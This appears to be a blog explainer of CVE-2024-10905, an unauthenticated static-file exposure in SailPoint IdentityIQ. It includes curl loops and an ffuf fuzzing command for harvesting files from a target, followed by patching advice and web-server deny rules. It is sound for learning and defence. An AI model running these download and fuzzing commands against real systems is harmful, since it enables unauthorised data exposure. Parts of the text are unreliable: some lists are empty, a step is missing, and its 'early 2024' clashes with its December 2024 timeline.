CVE-2024-10905 - Inside The Static Content Exposure in SailPoint IdentityIQ (8.2 to 8.4) – How It Works, How To Exploit, And How To Fix

SailPoint IdentityIQ is widely used for managing identities, automating access, and enforcing compliance in big enterprises. But in early 2024, a major security flaw — CVE-2024-10905 — was made public. This vulnerability exposed static files inside the IdentityIQ application that were supposed to be protected. If you're running one of these versions:

then your sensitive files might be at risk.

Let's break it down — simply, with example exploit details, and clear steps to mitigate.

What is the Issue?

IdentityIQ's web application serves some *static content* (like JavaScript files, images, XML files, and internal documentation) from a web-accessible directory. These files can contain:

Comments revealing hidden endpoints or configuration

Meant for internal use, these files are not supposed to be public on the internet. But, due to misconfigured HTTP access rules, attackers can download them without logging in.

Why does this matter?
These files often aid reconnaissance. Attackers hunting for exploits love to find internal docs, config files, or older versions’ sample code.

How would an attacker find this?

Suppose your org hosts IdentityIQ at https://identity.example.com/identityiq. An attacker can just start browsing suspected static directory paths, like:

https://identity.example.com/identityiq/static/

or

https://identity.example.com/identityiq/WEB-INF/

or even deeper

https://identity.example.com/identityiq/js/
https://identity.example.com/identityiq/docs/

These aren’t the actual subfolders in every install, but they’re common in Java web apps. In the case of CVE-2024-10905, many instances allowed HTTP GETs to certain resource folders.

Here's how an attacker might quickly list and exfiltrate static files using curl and a shell loop

# Example: downloading all '.js' and '.xml' files from a public static folder
for file in $(curl -s 'https://identity.example.com/identityiq/static/' | grep -oE 'href="[^"]+\.(js|xml)"' | cut -d'"' -f2); do
  curl -O "https://identity.example.com/identityiq/static/$file"
done

Or with just curl for a known file (say, someone found config.xml leaks)

curl -O 'https://identity.example.com/identityiq/static/config.xml'

If directory listing is disabled, the attacker may use wordlists and tools like dirsearch or ffuf:

ffuf -u https://identity.example.com/identityiq/FUZZ -w common.txt

Even a simple browser and guesswork can access items like

- /identityiq/static/scripts.js
- /identityiq/static/help.html
- /identityiq/static/config.xml
- /identityiq/static/internal_api_documentation.html

What’s The Risk?

- Sensitive information leakage: Internal docs, hardcoded credentials, configurations, even internal API notes.

Recon for further attacks: Exact product version, enabled features, undocumented functionality.

- Help for RCE or privilege escalation: Anyone chaining other bugs (e.g. deserialization, weak endpoints) will use this info.

References

- CVE-2024-10905 at NVD
- SailPoint customer portal security bulletins
- SailPoint’s release note for 8.4p2
- General Java web app directory traversal 101

1. Upgrade Immediately

If you’re below 8.4p2 (or 8.3p5 or 8.2p8), patch ASAP. According to SailPoint, the patch restricts access to these static files.

2. Remove Unused Files

If you have legacy folders or test files inside the IdentityIQ root, move them elsewhere or delete them.

Example for Apache HTTP

<Directory "/opt/identityiq/static">
    Order allow,deny
    Deny from all
</Directory>

Example for nginx

location /identityiq/static/ {
    deny all;
}

Example for Tomcat’s web.xml

<security-constraint>
  <web-resource-collection>
    <web-resource-name>Static Protected</web-resource-name>
    <url-pattern>/static/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>

4. Scan Regularly

Use tools like Nikto or OWASP ZAP to scan for public static files.

Final Thoughts

A bug like CVE-2024-10905 is the kind that an attacker lives for: easy to exploit, overlooked in default configs, loaded with information for more complex attacks down the road. Fixing it is simple: patch, block, and verify. If you’re on IdentityIQ, don’t ignore this — keep your org’s secrets out of public reach.


*Stay vigilant, patch often, and never assume "static" means "safe".*

If you’re a customer and need more info, consult the SailPoint official advisory or your vendor directly. Happy patching!

Timeline

Published on: 12/02/2024 15:15:10 UTC